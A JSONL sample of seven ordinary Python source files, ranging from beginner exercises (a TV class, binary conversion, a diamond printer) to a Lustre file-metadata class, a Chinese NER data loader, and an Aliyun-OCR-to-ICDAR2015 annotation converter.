+{"seq_id":"399015641","text":"class Televisao:\n def __init__(self,marca,tipo):\n self.ligada = False\n self.marca = marca\n self.tipo = tipo\n self.canal = 2\n\n def power(self):\n if self.ligada:\n self.ligada = False\n else:\n self.ligada = True\n\n def status(self):\n if self.ligada:\n return \"A televisão da {marca} {tipo} está ligada\".format(marca = self.marca, tipo = self.tipo)\n else:\n return \"A televisão da {marca} {tipo} está desligada\".format(marca = self.marca, tipo = self.tipo)\n\n\n def aumentar_canal(self):\n if self.ligada:\n self.canal += 1\n\n\n def diminuir_canal(self):\n if self.ligada:\n self.canal -= 1\n\n \nif __name__ == \"__main__\":\n televisao = Televisao(\"Samsung\",\"QLED\")\n televisao.power()\n print(televisao.status())\n\n televisao.power()\n print(televisao.status())\n\n\n televisao.power()\n televisao.aumentar_canal()\n televisao.aumentar_canal()\n televisao.diminuir_canal()\n\n print(\"A televisão está no canal: {}\".format(televisao.canal))\n\n","sub_path":"app_python/televisao.py","file_name":"televisao.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"250205669","text":"a = eval(input('Please enter the decimal number: '))\r\nb = a % 2\r\nc = a // 2\r\nd = ''\r\nd = str(b) + d\r\nwhile c > 0:\r\n b = c % 2\r\n c = c // 2\r\n d = str(b) + d\r\nprint(d)","sub_path":"078.py","file_name":"078.py","file_ext":"py","file_size_in_byte":174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"340610393","text":"from math import floor\ndef ndiamond(n):\n a = 1\n i = 1\n k = 1\n j = (n-1)/2\n while i < n:\n print((j-1)*\" \"),\n print(a*a)\n i = i + 2\n a = a*10 + 1\n j = j -1 \n print(a*a)\n c = int(floor(a/10))\n while i > 1:\n print((k-1)*\" \"),\n print(c*c)\n c = int(floor(c/10))\n i = i - 2\n k = k + 1\n \n \nndiamond()","sub_path":"Assignments/Python_Assignment3/Codes/Q4b.py","file_name":"Q4b.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"521618498","text":"import os\nimport pylut\nimport stat\nimport hashlib\n\nclass FSItem( object ):\n \"\"\"\n Encapsulate file information such as name, absolute path,\n mountpoint, stat info (from os.lstat), stripe info, etc.\n \"\"\"\n\n # stat info key names\n statinfo_keys = ( 'mode', 'ino', 'dev', 'nlink', 'uid',\n 'gid', 'size', 'atime', 'mtime', 'ctime' )\n\n # md5 checksum blocksize (assume bigger is better, faster)\n md5_blocksize = 512 * 1024 * 1024\n\n def __init__( self, path, absname=None, mountpoint=None ):\n \"\"\"\n Can instantiate with either a full path only OR pass in all three arguments.\n :param path str: either a full path or just a name\n :param absname str: OPTIONAL the absolute path to the file, if not provided, an attempt will be made to look it up\n :param mountpoint str: OPTIONAL path to the mountpoint, if not provided, an attempt will be made to look it up\n \"\"\"\n self.name = os.path.basename( path )\n self.absname = absname\n self.mountpoint = mountpoint\n self._statinfo = None #os.lstat\n self._stripeinfo = None #pylut.getstripeinfo\n self._fid = None #pylut.path2fid\n self._checksum = None #hashlib.md5().hexdigest\n if self.absname is None:\n self.absname = os.path.abspath( path )\n if self.mountpoint is None:\n self.mountpoint = getmountpoint( self.absname )\n\n\n def __repr__( self ):\n return '<{0} {1} {2}>'.format( self.__class__.__name__, self._fid, self.absname )\n\n\n def __str__( self ):\n return self.absname\n\n\n def fid( self ):\n if self._fid is None:\n self._fid = pylut.path2fid( self.absname )\n return self._fid\n\n\n def stat( self ):\n \"\"\"\n Return file stat information, getting it if needed\n \"\"\"\n # Store statinfo as a local dict\n if self._statinfo is None:\n st = os.lstat( self.absname )\n self._statinfo = {}\n for x in self.statinfo_keys:\n k = 'st_{0}'.format( x )\n self._statinfo[ x ] = getattr( st, k )\n return self._statinfo\n\n\n def stripeinfo( self ):\n \"\"\"\n Return stripe information, getting it if needed\n \"\"\"\n if self._stripeinfo is None:\n self._stripeinfo = pylut.getstripeinfo( self.absname )\n return self._stripeinfo\n\n\n def checksum( self ):\n if self._checksum is None:\n if self.exists():\n cksum = hashlib.md5()\n with open( self.absname, 'rb' ) as f:\n for chunk in iter( lambda: f.read( self.md5_blocksize ), b'' ):\n cksum.update( chunk )\n self._checksum = cksum.hexdigest()\n return self._checksum\n \n\n\n def exists( self ):\n try:\n self.stat()\n except ( OSError ) as e:\n if e.errno == 2: \n return False\n raise e\n return True\n \n\n def is_dir( self ):\n return stat.S_ISDIR( self.mode )\n\n\n def is_file( self ):\n return stat.S_ISREG( self.mode )\n\n\n def is_symlink( self ):\n return stat.S_ISLNK( self.mode )\n\n\n def compare( self, other, attrnames ):\n \"\"\" Compare (one or more) attributes (given by attrnames)\n Returns a tuple of True/False values for each attribute\n Result tuple has the same order as attrnames\n \"\"\"\n return tuple( getattr( self, x ) == getattr( other, x ) for x in attrnames )\n\n\n def update( self ):\n \"\"\"\n Force update of all transient information \n (stripeinfo, statinfo, fid, checksum)\n \"\"\"\n self._statinfo = None\n self._stripeinfo = None\n self._fid = None\n self._checksum = None\n\n\n def __getattr__( self, name ):\n # allow easy stat information lookup\n if name in self.statinfo_keys:\n return self.stat()[ name ]\n # allow easy stripeinfo lookup\n if name.startswith( 'stripe' ):\n return getattr( self.stripeinfo(), name[6:] )\n raise AttributeError('{0} not found in {1}'.format( \n name, self.__class__.__name__) )\n\n\ndef getmountpoint( path ): \n path = os.path.realpath( os.path.abspath( path ) )\n while path != os.path.sep:\n if os.path.ismount( path ):\n return path\n path = os.path.abspath( os.path.join( path, os.pardir ) )\n return path\n\n\nif __name__ == '__main__':\n raise UserWarning( 'Cmdline not supported' )\n","sub_path":"fsitem.py","file_name":"fsitem.py","file_ext":"py","file_size_in_byte":4601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"140072268","text":"import os\nfrom datetime import datetime\n\nLOG_LOCATION = os.path.join(*[os.getcwd(),'errorLog.txt'])\n\ndef log_error(e):\n f = open(LOG_LOCATION,'a')\n f.write('------------------------------------\\n')\n f.write('Time: ' + str(datetime.now()) + \"\\n\")\n f.write(str(e) + \"\\n\")\n f.write('------------------------------------\\n')\n f.close()\n","sub_path":"libs/error_logger.py","file_name":"error_logger.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"533483258","text":"import sys, pickle, os, random\nimport numpy as np\n\n## tags, BIO\n# tag2label = {\"O\": 0,\n# \"B-PER\": 1, \"I-PER\": 2,\n# \"B-LOC\": 3, \"I-LOC\": 4,\n# \"B-ORG\": 5, \"I-ORG\": 6,\n# \"B-TIME\":7, \"I-TIME\":8,\n# \"B-ROLE\":9, \"I-ROLE\":10,\n# \"B-CRIME\":11, \"I-CRIME\":12,\n# \"B-LAW\":13, \"I-LAW\":14\n# }\n# tag2label = {\"O\": 0,\n# \"B-PER\": 1, \"I-PER\": 2,\n# \"B-LOC\": 3, \"I-LOC\": 4,\n# \"B-ORG\": 5, \"I-ORG\": 6\n# }\ntag2label = {\"O\":0,\n \"B-ALG\":1,\"I-ALG\":2,\n \"B-MDL\":3,\"I-MDL\":4,\n \"B-TECH\":5,\"I-TECH\":6,\n \"B-OPQ\":7,\"I-OPQ\":8,\n \"B-CHAR\":9,\"I-CHAR\":10,\n \"B_TECH\":11}\n\ndef read_corpus(corpus_path):#读data,返回char label组成的data\n \"\"\"\n read corpus and return the list of samples\n :param corpus_path:\n :return: data,list形式。文件下的所有句子以及对应的label,以(句子,label)(句子,label)形式的list返回\n \"\"\"\n data = []\n with open(corpus_path, encoding='utf-8') as fr:\n lines = fr.readlines()\n sent_, tag_ = [], []\n for line in lines:\n if line != '\\n':\n try:\n [char, label] = line.strip().split(' ')#字,B-LABEL\n sent_.append(char)#句子中所有的字\n tag_.append(label)#句子中所有的label\n except Exception as e:\n print(e)\n pass\n else:\n data.append((sent_, tag_))#data:句子和label两个list组成的tuple加入到datalist中\n sent_, tag_ = [], []\n return data\n\n\ndef vocab_build(vocab_path, corpus_path, min_count):\n \"\"\"\n\n :param vocab_path:\n :param corpus_path:\n :param min_count:\n :return:\n \"\"\"\n data = read_corpus(corpus_path)\n word2id = {}\n for sent_, tag_ in data:\n for word in sent_:\n if word.isdigit():\n word = ''\n elif ('\\u0041' <= word <='\\u005a') or ('\\u0061' <= word <='\\u007a'):\n word = ''\n if word not in word2id:\n word2id[word] = [len(word2id)+1, 1]\n else:\n word2id[word][1] += 1\n low_freq_words = []\n for word, [word_id, word_freq] in word2id.items():\n if word_freq < min_count and word != '' and word != '':\n low_freq_words.append(word)\n for word in low_freq_words:\n del word2id[word]\n\n new_id = 1\n for word in word2id.keys():\n word2id[word] = new_id\n new_id += 1\n word2id[''] = new_id\n word2id[''] = 0\n\n print(len(word2id))\n with open(vocab_path, 'wb') as fw:\n pickle.dump(word2id, fw)\n\n#将句子里的每个字返回其对应在字典里的下标值\n#eg:['于', '大', '宝', '的', '进', '球', '帮', '助', '中', '国', '队', '在', '长', '沙', '贺', '龙', '体', '育', '中', '心', '以', '1', '-', '0', '的', '比', '分', '获', '胜']\n# [273, 55, 1071, 8, 430, 1912, 1092, 7, 52, 21, 569, 73, 14, 2065, 2405, 600, 922, 451, 52, 237, 134, 94, 3904, 94, 8, 805, 786, 725, 831]\ndef sentence2id(sent, word2id):\n \"\"\"\n\n :param sent:--句子\n :param word2id:--字典,每个字对应一个数字\n :return:sentence_id--一句话中每个字对应的字典下标\n \"\"\"\n sentence_id = []\n for word in sent:\n #word是数字的情况,贴NUM标签\n if word.isdigit():\n word = ''\n #word是a-z或者A-Z的情况,贴ENG标签\n elif ('\\u0041' <= word <= '\\u005a') or ('\\u0061' <= word <= '\\u007a'):\n word = ''\n #word不在字典里\n if word not in word2id:\n word = ''\n sentence_id.append(word2id[word])\n #返回字典里的下标\n return sentence_id\n\n#返回一个word2id的dict,长度为3905,eg:{‘字1’:2201,‘字2’:599...}\ndef read_dictionary(vocab_path):\n \"\"\"\n\n :param vocab_path:\n :return:\n \"\"\"\n vocab_path = os.path.join(vocab_path)\n with open(vocab_path, 'rb') as fr:\n word2id = pickle.load(fr)\n print('vocab_size:', len(word2id))#list_size:3905\n return word2id\n\n#生成一个随机的(3905,300)维array\n\ndef random_embedding(vocab, embedding_dim):\n \"\"\"\n :param vocab:\n :param embedding_dim:\n :return:\n \"\"\"\n #从均匀分布中抽取样本。样品在半开区间均匀分布 (包括低,但不包括高)。\n embedding_mat = np.random.uniform(-0.25, 0.25, (len(vocab), embedding_dim))\n embedding_mat = np.float32(embedding_mat)#shape(3905,300)\n return embedding_mat\n\n\ndef pad_sequences(sequences, pad_mark=0):\n \"\"\"\n\n :param sequences:\n :param pad_mark:\n :return:扩充或截断的句子序列以及min(len(seq), max_len)\n \"\"\"\n #29\n #获取sequences中所有list的最长长度\n max_len = max(map(lambda x : len(x), sequences))#135\n seq_list, seq_len_list = [], []\n for seq in sequences:\n seq = list(seq)\n seq_ = seq[:max_len] + [pad_mark] * max(max_len - len(seq), 0)\n seq_list.append(seq_)#sequences中扩充好的list\n seq_len_list.append(min(len(seq), max_len))#句子长度和最大长度的min\n return seq_list, seq_len_list\n\n#返回字典下标seqs,以及标签labels\n#eg:seqs[[273, 55, 1071, 8, 430, 1912, 1092, 7, 52, 21, 569, 73, 14, 2065, 2405, 600, 922, 451, 52, 237, 134, 94, 3904, 94, 8, 805, 786, 725, 831]]\n#labels [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]\ndef batch_yield(data, batch_size, vocab, tag2label, shuffle=False):\n \"\"\"\n\n :param data:--traindata\n :param batch_size:default64\n :param vocab:--word2id\n :param tag2label:--tag2label\n :param shuffle:\n :return:seqs--batch_size句子中每句话每个字对应的字典下标\n labels--batch_size句子中每句话每个字的标签\n \"\"\"\n if shuffle:\n random.shuffle(data)\n\n seqs, labels = [], []\n for (sent, tag_) in data:\n sent_ = sentence2id(sent, vocab)#返回句子中每个字在字典中的下标\n label_ = [tag2label[tag] for tag in tag_]#一句话中每个字的标签\n\n if len(seqs) == batch_size:\n yield seqs, labels\n seqs, labels = [], []\n\n seqs.append(sent_)\n labels.append(label_)\n\n if len(seqs) != 0:\n yield seqs, labels\n\n","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":6440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"301818296","text":"\n\"\"\"\n\n给 PaddleOCR 用,前面是坐标和图片都变换;这里图像不变,坐标不变 \n\n\n将阿里OCR 的识别结果(图片和标注)转换成 icdar2015 格式 (注意:它的文本是含 utf8 bom 的)\n\n给 mmocr 训练用。格式是 icdar2015 的格式,文件夹的组织方式是按照 mmocr 的要求创建的\n\n\"\"\"\n\n\n\"\"\"\n\n! unzip ./GD500.zip -d DB/datasets\n\nicdar2015 文本检测数据集\n标注格式: x1,y1,x2,y2,x3,y3,x4,y4,text\n\n其中, x1,y1为左上角坐标,x2,y2为右上角坐标,x3,y3为右下角坐标,x4,y4为左下角坐标。 \n\n### 表示text难以辨认。\n\"\"\"\n\n\n\n\nimport random\nfrom pathlib import Path\nimport os\nimport glob\nimport base64\nfrom importlib.resources import path\nimport math\nimport numpy as np\nimport cv2\nimport json\nimport decimal\nimport datetime\nfrom pickletools import uint8\nclass DecimalEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, decimal.Decimal):\n return float(o)\n elif isinstance(o, datetime.datetime):\n return str(o)\n super(DecimalEncoder, self).default(o)\n\n\ndef save_json(filename, dics):\n with open(filename, 'w', encoding='utf-8') as fp:\n json.dump(dics, fp, indent=4, cls=DecimalEncoder, ensure_ascii=False)\n fp.close()\n\n\ndef load_json(filename):\n with open(filename, encoding='utf-8') as fp:\n js = json.load(fp)\n fp.close()\n return js\n\n# convert string to json\n\n\ndef parse(s):\n return json.loads(s, strict=False)\n\n# convert dict to string\n\n\ndef string(d):\n return json.dumps(d, cls=DecimalEncoder, ensure_ascii=False)\n\n\ndef transform(points, M):\n # points 算出四个点变换后移动到哪里了\n # points = np.array([[word_x, word_y], # 左上\n # [word_x + word_width, word_y], # 右上\n # [word_x + word_width, word_y + word_height], # 右下\n # [word_x, word_y + word_height], # 左下\n # ])\n # add ones\n ones = np.ones(shape=(len(points), 1))\n\n points_ones = np.hstack([points, ones])\n\n # transform points\n transformed_points = M.dot(points_ones.T).T\n\n transformed_points_int = np.round(\n transformed_points, decimals=0).astype(np.int32) # 批量四舍五入\n \n return transformed_points_int\n\n\ndef cutPoly(img, pts):\n # img = cv2.imdecode(np.fromfile('./t.png', dtype=np.uint8), -1)\n # pts = np.array([[10,150],[150,100],[300,150],[350,100],[310,20],[35,10]])\n\n ## (1) Crop the bounding rect\n rect = cv2.boundingRect(pts)\n x,y,w,h = rect\n croped = img[y:y+h, x:x+w].copy()\n\n ## (2) make mask\n pts = pts - pts.min(axis=0)\n\n mask = np.zeros(croped.shape[:2], np.uint8)\n cv2.drawContours(mask, [pts], -1, (255, 255, 255), -1, cv2.LINE_AA)\n\n ## (3) do bit-op\n dst = cv2.bitwise_and(croped, croped, mask=mask)\n\n ## (4) add the white background\n bg = np.ones_like(croped, np.uint8)*255\n cv2.bitwise_not(bg,bg, mask=mask)\n dst2 = bg+ dst\n\n\n # cv2.imwrite(\"croped.png\", croped)\n # cv2.imwrite(\"mask.png\", mask)\n # cv2.imwrite(\"dst.png\", dst)\n # cv2.imwrite(\"dst2.png\", dst2)\n\n return dst2\n\n\n\nif __name__ == \"__main__\":\n\n # 验证原版的文本标记框\n # im = './train_images/img_1.jpg'\n # gt = './train_gts/gt_img_1.txt'\n\n # 验证自已生成的标记框\n im = './icdar2015_aliocr/imgs/training/img_1.jpg'\n gt = './icdar2015_aliocr/annotations/training/gt_img_1.txt'\n\n if os.path.exists(gt):\n\n items = []\n reader = open(gt, 'r', encoding='utf-8-sig').readlines()\n for line in reader:\n item = {}\n parts = line.strip().split(',')\n label = parts[-1]\n if 'TD' in gt and label == '1':\n label = '###'\n line = [i.strip('\\ufeff').strip('\\xef\\xbb\\xbf') for i in parts]\n if 'icdar' in gt:\n poly = np.array(list(map(float, line[:8]))).reshape(\n (-1, 2)).tolist()\n else:\n num_points = math.floor((len(line) - 1) / 2) * 2\n poly = np.array(list(map(float, line[:num_points]))).reshape(\n (-1, 2)).tolist()\n item['poly'] = poly\n item['text'] = label\n # 多边形是用一个个的点表示的,起点连接第二个点,第二个连接第三个 ... 最后一点连接起点,构成一个闭合的区域\n item['points'] = poly\n # 此标记表示文字模糊不可辨认,文本框的标记是不可靠的\n item['ignore'] = True if label == '###' else False\n items.append(item)\n\n img = cv2.imdecode(np.fromfile(im, dtype=np.uint8), -1)\n # DBNet 原版代码只能处理彩图,所以统一处理成彩图\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n for i in range(len(items)):\n poly = items[i]['poly']\n poly = np.array(poly)\n poly = poly.astype(np.int32)\n\n #cv2.fillPoly(img, pts=[ poly ], color=(0, 0, 255))\n\n b = random.randint(0, 255) # 用来生成[a,b]之间的随意整数,包括两个边界值。\n g = random.randint(0, 255)\n r = random.randint(0, 255)\n\n # 只画线,不填充 # 就是画线,从起点连到第二个点 ... 最后一个点连到第一个点\n cv2.polylines(img, [poly], isClosed=True,\n color=(b, g, r), thickness=1)\n\n #cv2.imwrite(\"poly.jpg\", img)\n\n # cv2.imshow(\"poly\", img)\n # cv2.waitKey()\n\n # 开始转换\n\n out_dir = 'icdar2015_aliocr'\n\n # https://help.aliyun.com/document_detail/294540.html 阿里云ocr结果字段定义\n # prism-wordsInfo 里的 angle 文字块的角度,这个角度只影响width和height,当角度为-90、90、-270、270,width和height的值需要自行互换\n\n dir_json = './data/json' # '/yingedu/www/ocr_server/data/json'\n dir_img = './data/img' # '/yingedu/www/ocr_server/data/img'\n\n train_list = []\n train_list_txt_path = os.path.join(out_dir, 'train_list.txt')\n\n g_count = 1\n\n json_paths = glob.glob('{}/*.json'.format(dir_json), recursive=True)\n\n for json_path in json_paths:\n\n base = Path(json_path).stem\n\n img_path = os.path.join(dir_img, '{}.txt'.format(base))\n\n if not os.path.exists(img_path): # 没有相应的图片,可能被删除了\n continue\n\n jsn = load_json(json_path)\n\n with open(img_path, \"r\", encoding=\"utf-8\") as fp:\n imgdata = fp.read()\n imgdata = base64.b64decode(imgdata)\n imgdata = np.frombuffer(imgdata, np.uint8)\n img = cv2.imdecode(imgdata, cv2.IMREAD_UNCHANGED)\n\n # cv2.imshow('img', img)\n # cv2.waitKey(0)\n\n if len(img.shape) != 3: # 转彩图\n img_color = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR) # DBNet 原版只能处理彩图,这里转一下\n\n else:\n img_color = img.copy()\n\n img_color_origin = img_color.copy()\n img_color_origin2 = img_color.copy()\n\n\n # 生成1000 张一模一样的图\n for i in range(1, 1000+1):\n\n num_img = i\n\n img_name = \"img_{}.jpg\".format(num_img)\n gt_name = \"gt_img_{}.txt\".format(num_img)\n\n gt_txt_list = []\n\n train_list.append(img_name)\n # num_img += 1\n\n img_path = os.path.join(out_dir, 'imgs', 'training', img_name)\n img_gt_path = os.path.join(\n out_dir, 'annotations', 'training', gt_name)\n\n cv2.imwrite(img_path, img)\n\n wordsInfo = jsn['prism_wordsInfo']\n for j in range(len(wordsInfo)):\n jo = wordsInfo[j]\n word = jo[\"word\"]\n # prism-wordsInfo 里的 angle 文字块的角度,这个角度只影响width和height,当角度为-90、90、-270、270,width和height的值需要自行互换\n angle = jo['angle']\n \n img_color = img_color_origin.copy()\n\n word_x = jo['x']\n word_y = jo['y']\n word_width = jo['width']\n word_height = jo['height']\n\n if abs(angle) == 90 or abs(angle) == 270:\n word_width = jo['height']\n word_height = jo['width']\n elif angle != 0:\n\n # 变换前画出绿框,方便追踪点的前后变化\n # img_color = cv2.rectangle(img_color, (word_x, word_y), (\n # word_x + word_width, word_y + word_height), (0, 255, 0), 2) # 矩形的左上角, 矩形的右下角\n\n # cv2.imshow(\"green\", img_color)\n # cv2.waitKey(0)\n\n # 变换前的多边形蓝框\n points = np.array([\n [word_x, word_y], # 左上\n [word_x + word_width, word_y], # 右上\n [word_x + word_width, word_y + word_height], # 右下\n [word_x, word_y + word_height], # 左下\n ])\n\n # # cv2.fillPoly(img_color, pts=[points], color=(255, 0, 0)) # 填充\n # cv2.polylines(img_color, [points], isClosed=True, color=(\n # 255, 0, 0), thickness=1) # 只画线,不填充\n\n # cv2.imshow(\"polys\", img_color)\n # cv2.waitKey(0)\n\n # 获取图像的维度,并计算中心\n (h, w) = img_color.shape[:2]\n (cX, cY) = (w // 2, h // 2)\n\n # - (cX,cY): 旋转的中心点坐标\n # - 180: 旋转的度数,正度数表示逆时针旋转,而负度数表示顺时针旋转。\n # - 1.0:旋转后图像的大小,1.0原图,2.0变成原来的2倍,0.5变成原来的0.5倍\n # 1° = π/180弧度 1 弧度 = 180 / 3.1415926 // 0.0190033 是Mathematica 算出来的弧度,先转换成角度 // -0.0190033 * (180 / 3.1415926)\n M = cv2.getRotationMatrix2D((cX, cY), angle, 1.0)\n img_color = cv2.warpAffine(img_color, M, (w, h))\n img_color_transform = img_color.copy()\n\n # cv2.imshow(\"after trans\", img_color)\n # cv2.waitKey(0)\n\n # https://docs.opencv.org/2.4/doc/tutorials/imgproc/imgtrans/warp_affine/warp_affine.html # 原理\n # https://stackoverflow.com/questions/30327659/how-can-i-remap-a-point-after-an-image-rotation # How can I remap a point after an image rotation?\n # 如何得到移动后的坐标点\n\n # points 算出四个点变换后移动到哪里了\n points = np.array([[word_x, word_y], # 左上\n # 右上\n [word_x + word_width, word_y],\n [word_x + word_width, word_y + \\\n word_height], # 右下\n [word_x, word_y + word_height], # 左下\n ])\n # add ones\n ones = np.ones(shape=(len(points), 1))\n\n points_ones = np.hstack([points, ones])\n\n # transform points\n transformed_points = M.dot(points_ones.T).T\n\n transformed_points_int = np.round(\n transformed_points, decimals=0).astype(np.int32) # 批量四舍五入\n\n cv2.polylines(img_color, [transformed_points_int], isClosed=True, color=(\n 0, 0, 255), thickness=2) # 画转换后的点\n\n\n cv2.polylines(img_color_origin, [points], isClosed=True, color=(\n random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)), thickness=2) # 画转换前的点\n\n \n\n # cv2.imshow(\"orgin\", img_color_origin)\n # cv2.waitKey(0)\n\n\n\n\n # 四个角的位置 # 左上、右上、右下、左下,当NeedRotate为true时,如果最外层的angle不为0,需要按照angle矫正图片后,坐标才准确\n pos = jo[\"pos\"]\n x = int(pos[0][\"x\"]) # 左上\n y = int(pos[0][\"y\"])\n\n x2 = int(pos[2][\"x\"]) # 右下\n y2 = int(pos[2][\"y\"])\n\n lu = [pos[0]['x'], pos[0]['y']] # left up 四个角顺时针方向数\n ru = [pos[1]['x'], pos[1]['y']]\n rd = [pos[2]['x'], pos[2]['y']]\n ld = [pos[3]['x'], pos[3]['y']]\n\n # 生成 icdar2015 格式的人工标记训练数据(用于训练 mmocr)\n #gt_txt_list.append( \"{},{},{},{},{},{},{},{},{}\".format(lu[0], lu[1], ru[0], ru[1], rd[0], rd[1], ld[0], ld[1], word) )\n\n # 绘制矩形\n start_point = (x, y) # 矩形的左上角\n\n end_point = (x2, y2) # 矩形的右下角\n\n color = (0, 0, 255) # BGR\n\n thickness = 2\n\n # 逐行画框\n # img_color = cv2.rectangle(img_color, start_point, end_point, color, thickness)\n # cv2.imshow(\"box\", img_color)\n\n # cv2.waitKey(0)\n\n points = [ lu, ru, rd, ld ]\n\n\n\n points0 = np.array([[word_x, word_y], # 左上\n # 右上\n [word_x + word_width, word_y],\n [word_x + word_width, word_y + \\\n word_height], # 右下\n [word_x, word_y + word_height], # 左下\n ])\n points1 = np.array( [ lu, ru, rd, ld ] )\n\n\n if not (abs(angle) == 90 or abs(angle) == 270) and angle != 0:\n points = transform( points, M )\n else:\n points = np.array(points)\n\n ps3 = np.array( \n [\n [min( points[0][0], points1[0][0] ), min( points[0][1], points1[0][1] )], # 左上(取最两者中最小的)\n\n [max( points[1][0], points1[1][0] ), min( points[1][1], points1[1][1] )], # 右上\n\n [max( points[2][0], points1[2][0] ), max( points[2][1], points1[2][1] )], # 右下\n\n [min( points[3][0], points1[3][0] ), max( points[3][1], points1[3][1] )] # 左下\n ]\n )\n\n img_cuted = cutPoly(img, ps3)\n cv2.imwrite(f'./tmp/{g_count}.jpg', img_cuted)\n with open(f'./tmp/{g_count}.txt', 'w', encoding='utf-8') as f:\n\t f.write(word)\n g_count += 1\n\n cv2.polylines(img_color, [points], isClosed=True, color=( # 多边形,框得比较全\n 100, 0, 255), thickness=2) # 只画线,不填充\n\n\n cv2.polylines(img_color_origin, [ points1 ], isClosed=True, color=(\n random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)), thickness=2) # 画转换前的点\n\n cv2.imshow(\"orgin\", img_color_origin)\n cv2.waitKey(0)\n\n # cv2.imshow(\"box\", img_color)\n # cv2.waitKey(0)\n\n # img_color = cv2.rectangle(img_color, points[0], points[2], color, thickness) # 正常矩形,框不完全\n # cv2.imshow(\"box\", img_color)\n\n # cv2.waitKey(0)\n\n\n\n\n\n if not (abs(angle) == 90 or abs(angle) == 270) and angle != 0:\n\n t = word\n ps = np.array( \n [\n [min( transformed_points_int[0][0], points[0][0] ), min( transformed_points_int[0][1], points[0][1] )], # 左上(取最两者中最小的)\n\n [max( transformed_points_int[1][0], points[1][0] ), min( transformed_points_int[1][1], points[1][1] )], # 右上\n\n [max( transformed_points_int[2][0], points[2][0] ), max( transformed_points_int[2][1], points[2][1] )], # 右下\n\n [min( transformed_points_int[3][0], points[3][0] ), max( transformed_points_int[3][1], points[3][1] )] # 左下\n ]\n )\n\n\n ps2 = np.array( \n [\n [min( points0[0][0], points1[0][0] ), min( points0[0][1], points1[0][1] )], # 左上(取最两者中最小的)\n\n [max( points0[1][0], points1[1][0] ), min( points0[1][1], points1[1][1] )], # 右上\n\n [max( points0[2][0], points1[2][0] ), max( points0[2][1], points1[2][1] )], # 右下\n\n [min( points0[3][0], points1[3][0] ), max( points0[3][1], points1[3][1] )] # 左下\n ]\n )\n\n # img_cuted = cutPoly(img_color_transform, ps)\n # cv2.imwrite(f'./tmp/{g_count}.jpg', img_cuted)\n\n # with open(f'./tmp/{g_count}.txt', 'w', encoding='utf-8') as f:\n\t # f.write(word)\n \n # g_count += 1\n\n cv2.polylines(img_color, [ ps ], isClosed=True, color=(\n 255, 0, 0), thickness=2) # 只画线,不填充\n\n cv2.polylines(img_color_origin, [ ps2 ], isClosed=True, color=(\n random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)), thickness=2) # 只画线,不填充\n \n cv2.imshow(\"orgin\", img_color_origin)\n cv2.waitKey(0)\n\n img_cuted = cutPoly(img, ps2)\n cv2.imwrite(f'./tmp/{g_count}.jpg', img_cuted)\n\n with open(f'./tmp/{g_count}.txt', 'w', encoding='utf-8') as f:\n\t f.write(word)\n\n g_count += 1\n\n\n # cv2.imshow(\"box\", img_color)\n\n # cv2.waitKey(0)\n\n lastx_mini = 0 # 下一个字符x 坐标的下界(肯定不小于这个值)\n prew = 0 # 上一个字符的宽度\n words = \"\"\n charInfo = jo[\"charInfo\"]\n\n min_cx = 9999 # 最小左上角\n min_cy = 9999\n\n max_cxcw = -1 # 最大右下角\n max_cych = -1\n\n for i in range(len(charInfo)):\n joc = charInfo[i]\n c = joc[\"word\"]\n cx = int(joc[\"x\"])\n cy = int(joc[\"y\"])\n cw = int(joc[\"w\"])\n ch = int(joc[\"h\"])\n\n if cx < min_cx:\n min_cx = cx\n if cy < min_cy:\n min_cy = cy\n\n if cx + cw > max_cxcw:\n max_cxcw = cx + cw\n\n if cy + ch > max_cych:\n max_cych = cy + ch\n\n # 绘制矩形\n start_point = (cx, cy) # 矩形的左上角\n\n end_point = (cx + cw, cy + ch) # 矩形的右下角\n\n color = (0, 0, 255) # BGR\n\n thickness = 2\n\n # 逐字画框\n # img_color = cv2.rectangle(\n # img_color, start_point, end_point, color, thickness)\n # cv2.imshow(\"box\", img_color)\n # cv2.waitKey(0)\n\n # 这个框更准一些\n # img_color = cv2.rectangle(\n # img_color, (min_cx, min_cy), (max_cxcw, max_cych), (0, 255, 0), thickness)\n # cv2.imshow(\"box\", img_color)\n # cv2.waitKey(0)\n\n # fix me: 如果上面的行框的左边要比这里更左,那就以行框的左边为准\n # 因为发现单个字的框会有漏字的现想\n\n gt_txt_list.append(\"{},{},{},{},{},{},{},{},{}\".format(\n min_cx, min_cy, max_cxcw, min_cy, max_cxcw, max_cych, min_cx, max_cych, word))\n\n gt_txt = '\\n'.join(gt_txt_list)\n\n with open(img_gt_path, \"w\", encoding='utf-8-sig') as fp:\n fp.write(gt_txt)\n","sub_path":"lang/programming/pytorch/文本检测/DBNET/dbnet_aliocr/icdar2015_aliocr_convert_v3.py","file_name":"icdar2015_aliocr_convert_v3.py","file_ext":"py","file_size_in_byte":20889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
